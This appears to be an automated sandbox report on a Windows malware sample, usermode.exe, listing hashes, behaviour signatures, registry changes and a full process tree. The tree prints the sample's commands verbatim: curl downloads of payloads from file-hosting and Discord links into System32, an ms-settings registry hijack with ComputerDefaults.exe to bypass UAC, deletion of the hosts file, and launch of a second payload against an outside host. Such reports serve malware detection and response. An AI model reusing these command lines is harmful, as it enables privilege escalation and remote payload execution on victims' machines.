Analysis
max time kernel
20s
max time network
22s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags
arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
submitted
30/10/2024, 13:56
Behavioral task
behavioral1
Sample
usermode.exe
Resource
win11-20241007-en
General
Target
usermode.exe
Size
5.4MB
MD5
fb4bf2834546449c2ce7593c9b152995
SHA1
962351902ca2b130d5652e6b42bc7c5fdf8ab4d4
SHA256
f63734e8c099081fb6f7386aaa960667e297a0b323d7b583d1a2cfcd974353dd
SHA512
275d02f4871707f7b57b348f0a882abf98b3746bd7c5da80180d6b4a0cf67415ae0d3992b4b410235054f57c0a5c81216fd4a572d0a8e8059d2fe154fa72d2a8
SSDEEP
98304:ApRYuEKLOdpy9owo8DQZpvSnHHQoCZ06i8ATTkPb7UzVC2wx7ETxZ:AsWOdpy9oX8oZti8UTmb7f2wx7El
Malware Config
Signatures
Downloads MZ/PE file

Executes dropped EXE 2 IoCs
pid Process
3400 secret.exe
3052 uBXGGIIoaOA3aw5m7pLMX006.exe

resource yara_rule
behavioral1/memory/3908-2-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp vmprotect
behavioral1/memory/3908-5-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp vmprotect
behavioral1/memory/3908-15-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp vmprotect
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc
1 raw.githubusercontent.com
8 raw.githubusercontent.com

Drops file in System32 directory 1 IoCs
description ioc Process
File created C:\Windows\System32\secret.exe curl.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Modifies registry class 22 IoCs
description ioc Process
Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings reg.exe
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\168587.vbs" reg.exe
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command reg.exe
Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command reg.exe
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open reg.exe
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings reg.exe
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open reg.exe
Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell reg.exe
Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings reg.exe
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings reg.exe
Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open reg.exe
Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell reg.exe
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell reg.exe
Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open reg.exe
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\542700.vbs" reg.exe
Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command reg.exe
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command reg.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process
3908 usermode.exe
3908 usermode.exe

Suspicious use of WriteProcessMemory 62 IoCs
description pid Process procid_target
PID 3908 wrote to memory of 4292 3908 usermode.exe 78
PID 3908 wrote to memory of 4292 3908 usermode.exe 78
PID 4292 wrote to memory of 2192 4292 cmd.exe 79
PID 4292 wrote to memory of 2192 4292 cmd.exe 79
PID 3908 wrote to memory of 3376 3908 usermode.exe 80
PID 3908 wrote to memory of 3376 3908 usermode.exe 80
PID 3376 wrote to memory of 3400 3376 cmd.exe 81
PID 3376 wrote to memory of 3400 3376 cmd.exe 81
PID 3400 wrote to memory of 3740 3400 secret.exe 82
PID 3400 wrote to memory of 3740 3400 secret.exe 82
PID 3740 wrote to memory of 3836 3740 cmd.exe 84
PID 3740 wrote to memory of 3836 3740 cmd.exe 84
PID 3400 wrote to memory of 2608 3400 secret.exe 85
PID 3400 wrote to memory of 2608 3400 secret.exe 85
PID 2608 wrote to memory of 3788 2608 cmd.exe 87
PID 2608 wrote to memory of 3788 2608 cmd.exe 87
PID 2608 wrote to memory of 2932 2608 cmd.exe 88
PID 2608 wrote to memory of 2932 2608 cmd.exe 88
PID 3400 wrote to memory of 4512 3400 secret.exe 89
PID 3400 wrote to memory of 4512 3400 secret.exe 89
PID 4512 wrote to memory of 3756 4512 cmd.exe 91
PID 4512 wrote to memory of 3756 4512 cmd.exe 91
PID 3756 wrote to memory of 436 3756 ComputerDefaults.exe 92
PID 3756 wrote to memory of 436 3756 ComputerDefaults.exe 92
PID 436 wrote to memory of 1448 436 wscript.exe 93
PID 436 wrote to memory of 1448 436 wscript.exe 93
PID 3400 wrote to memory of 1104 3400 secret.exe 95
PID 3400 wrote to memory of 1104 3400 secret.exe 95
PID 3400 wrote to memory of 1688 3400 secret.exe 97
PID 3400 wrote to memory of 1688 3400 secret.exe 97
PID 1688 wrote to memory of 4816 1688 cmd.exe 99
PID 1688 wrote to memory of 4816 1688 cmd.exe 99
PID 3400 wrote to memory of 1240 3400 secret.exe 100
PID 3400 wrote to memory of 1240 3400 secret.exe 100
PID 1240 wrote to memory of 4508 1240 cmd.exe 102
PID 1240 wrote to memory of 4508 1240 cmd.exe 102
PID 3400 wrote to memory of 2144 3400 secret.exe 103
PID 3400 wrote to memory of 2144 3400 secret.exe 103
PID 2144 wrote to memory of 4036 2144 cmd.exe 105
PID 2144 wrote to memory of 4036 2144 cmd.exe 105
PID 2144 wrote to memory of 2584 2144 cmd.exe 106
PID 2144 wrote to memory of 2584 2144 cmd.exe 106
PID 3400 wrote to memory of 3388 3400 secret.exe 107
PID 3400 wrote to memory of 3388 3400 secret.exe 107
PID 3388 wrote to memory of 892 3388 cmd.exe 109
PID 3388 wrote to memory of 892 3388 cmd.exe 109
PID 892 wrote to memory of 392 892 ComputerDefaults.exe 110
PID 892 wrote to memory of 392 892 ComputerDefaults.exe 110
PID 392 wrote to memory of 1524 392 wscript.exe 111
PID 392 wrote to memory of 1524 392 wscript.exe 111
PID 1524 wrote to memory of 3052 1524 cmd.exe 113
PID 1524 wrote to memory of 3052 1524 cmd.exe 113
PID 3400 wrote to memory of 1468 3400 secret.exe 114
PID 3400 wrote to memory of 1468 3400 secret.exe 114
PID 3400 wrote to memory of 2004 3400 secret.exe 119
PID 3400 wrote to memory of 2004 3400 secret.exe 119
PID 2004 wrote to memory of 2136 2004 cmd.exe 121
PID 2004 wrote to memory of 2136 2004 cmd.exe 121
PID 3908 wrote to memory of 1948 3908 usermode.exe 122
PID 3908 wrote to memory of 1948 3908 usermode.exe 122
PID 1948 wrote to memory of 1488 1948 cmd.exe 123
PID 1948 wrote to memory of 1488 1948 cmd.exe 123
Processes
(indentation shows parent/child depth in the process tree)

C:\Users\Admin\AppData\Local\Temp\usermode.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\usermode.exe"
  PID: 3908
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c curl "https://files.catbox.moe/zalgwe.bin" --output "C:\Windows\System32\secret.exe" >nul 2>&1
      PID: 4292
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\curl.exe
          Command line: curl "https://files.catbox.moe/zalgwe.bin" --output "C:\Windows\System32\secret.exe"
          PID: 2192
          - Drops file in System32 directory

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c C:\Windows\System32\secret.exe
      PID: 3376
      - Suspicious use of WriteProcessMemory

        C:\Windows\System32\secret.exe
          Command line: C:\Windows\System32\secret.exe
          PID: 3400
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory

            C:\Windows\system32\cmd.exe
              Command line: /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
              PID: 3740
              - Suspicious use of WriteProcessMemory

                C:\Windows\system32\reg.exe
                  Command line: reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                  PID: 3836

            C:\Windows\system32\cmd.exe
              Command line: /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\542700.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
              PID: 2608
              - Suspicious use of WriteProcessMemory

                C:\Windows\system32\reg.exe
                  Command line: reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\542700.vbs" /f
                  PID: 3788
                  - Modifies registry class

                C:\Windows\system32\reg.exe
                  Command line: reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                  PID: 2932
                  - Modifies registry class

            C:\Windows\system32\cmd.exe
              Command line: /c start /B ComputerDefaults.exe
              PID: 4512
              - Suspicious use of WriteProcessMemory

                C:\Windows\system32\ComputerDefaults.exe
                  Command line: ComputerDefaults.exe
                  PID: 3756
                  - Suspicious use of WriteProcessMemory

                    C:\Windows\system32\wscript.exe
                      Command line: "wscript.exe" C:\Users\Admin\AppData\Local\Temp\542700.vbs
                      PID: 436
                      - Suspicious use of WriteProcessMemory

                        C:\Windows\System32\cmd.exe
                          Command line: "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
                          PID: 1448

            C:\Windows\system32\cmd.exe
              Command line: /c del /f C:\Users\Admin\AppData\Local\Temp\542700.vbs
              PID: 1104

            C:\Windows\system32\cmd.exe
              Command line: /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
              PID: 1688
              - Suspicious use of WriteProcessMemory

                C:\Windows\system32\reg.exe
                  Command line: reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                  PID: 4816
                  - Modifies registry class

            C:\Windows\system32\cmd.exe
              Command line: /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
              PID: 1240
              - Suspicious use of WriteProcessMemory

                C:\Windows\system32\reg.exe
                  Command line: reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                  PID: 4508

            C:\Windows\system32\cmd.exe
              Command line: /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\168587.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
              PID: 2144
              - Suspicious use of WriteProcessMemory

                C:\Windows\system32\reg.exe
                  Command line: reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\168587.vbs" /f
                  PID: 4036
                  - Modifies registry class

                C:\Windows\system32\reg.exe
                  Command line: reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                  PID: 2584
                  - Modifies registry class

            C:\Windows\system32\cmd.exe
              Command line: /c start /B ComputerDefaults.exe
              PID: 3388
              - Suspicious use of WriteProcessMemory

                C:\Windows\system32\ComputerDefaults.exe
                  Command line: ComputerDefaults.exe
                  PID: 892
                  - Suspicious use of WriteProcessMemory

                    C:\Windows\system32\wscript.exe
                      Command line: "wscript.exe" C:\Users\Admin\AppData\Local\Temp\168587.vbs
                      PID: 392
                      - Suspicious use of WriteProcessMemory

                        C:\Windows\System32\cmd.exe
                          Command line: "C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe jwah3vi8udplil4pnbtk5lm9cw9p1w:uBXGGIIoaOA3aw5m7pLMX006:matchashop.icu
                          PID: 1524
                          - Suspicious use of WriteProcessMemory

                            C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe
                              Command line: C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe jwah3vi8udplil4pnbtk5lm9cw9p1w:uBXGGIIoaOA3aw5m7pLMX006:matchashop.icu
                              PID: 3052
                              - Executes dropped EXE

            C:\Windows\system32\cmd.exe
              Command line: /c del /f C:\Users\Admin\AppData\Local\Temp\168587.vbs
              PID: 1468

            C:\Windows\system32\cmd.exe
              Command line: /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
              PID: 2004
              - Suspicious use of WriteProcessMemory

                C:\Windows\system32\reg.exe
                  Command line: reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                  PID: 2136
                  - Modifies registry class

    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c curl "https://cdn.discordapp.com/attachments/1263645426599596164/1293915367185580053/dukedennis.otf?ex=67091c17&is=6707ca97&hm=681743a411446d1716303f04ab6b576ca7b42f46779ab825121f40f4a198b70a" --output "C:\dukedennis.otf" >nul 2>&1
      PID: 1948
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\curl.exe
          Command line: curl "https://cdn.discordapp.com/attachments/1263645426599596164/1293915367185580053/dukedennis.otf?ex=67091c17&is=6707ca97&hm=681743a411446d1716303f04ab6b576ca7b42f46779ab825121f40f4a198b70a" --output "C:\dukedennis.otf"
          PID: 1488
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize 1KB
MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Filesize 436B
MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize 174B
MD5 3bf53b7cb0ef14526332140e3f06e30e
SHA1 73684a2e322f714d3cf7396cc467f4b2fbe48c60
SHA256 63d7227e22957e115ece214bf46e427d95782e2ed7c5be04b43bad30a50d9014
SHA512 82728bb630791419f845e5a1a9a67b210fb4065f9603616aca1d9446d080028a0a64bed10d5e405f453e32fbf5d31fb020a9ec38ba9ca01e843c97fe437c3eee

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize 170B
MD5 bd34d3e89ca124297388a6e74ba69449
SHA1 54742685dfa4f520e2e93b2024629c91c925ccfb
SHA256 4173a607877121ad103b1018726634f0d28bf6ca7ac86be683f162a6abbacd7b
SHA512 700573da5a8fb38ee6fc9f92b45f33d2d2a0ac6610eb572ef0cb164c686164d5dbdf07e1012606f57cad64102b00fc443fa9c1031d517d0d7c9cf5ab8593eb2d

Filesize 2.7MB
MD5 925efe96cdd4c38990ce77cf97f5218f
SHA1 6deeb34ba43549ac8a7d6b545257e6df64e29495
SHA256 c0f88af9fb0d75921f09ead45882adb82a2b1222d728de0f10ae8a875ee757a4
SHA512 3d7a24dea82a9908ed599680dbe1caeadbee5cb04aa06a4c6310ceccd8f98f8ca9f0666434d48945e44ec48c3f4ef21d3c23df4252b4d5792995a4b1892014d3

Filesize 246B
MD5 0b4570ab9e0b9b3a1c729d2dfe4269cf
SHA1 d8f47021a2000ec2160cfceeb59654d28d3b7ba4
SHA256 d4aec27b2377d3267c10348eaacfaa97dbb2ca0c3f0f5170d905301a77ae0f9d
SHA512 0adf851c389281cbd1c28a6ac08691179dec2a536f1d68ce46a621e5d234dbb5cd826aaea2193a674e1396fdaa745f21fba9988cb2cb19736d0c153f3b86422e

Filesize 125B
MD5 8b4ed5c47fdddbeba260ef11cfca88c6
SHA1 868f11f8ed78ebe871f9da182d053f349834b017
SHA256 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA512 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

Filesize 228KB
MD5 68487b48506703ac72bf48e57a5f6ffa
SHA1 7eb5a51f8ecead1e555d79db58bb43e61264b51b
SHA256 f3ecc9924b3a625fcc54d59008706e41c830c6952bf836e77352a340251c8cae
SHA512 033f745e1c289ad4cd69b1494962fd6260484cb300c7556d76635908dbc5f54e626b5c21e130058c5d84b5978eff3628dd6fd8b56e35bf37c0a6f866ffb8cbb0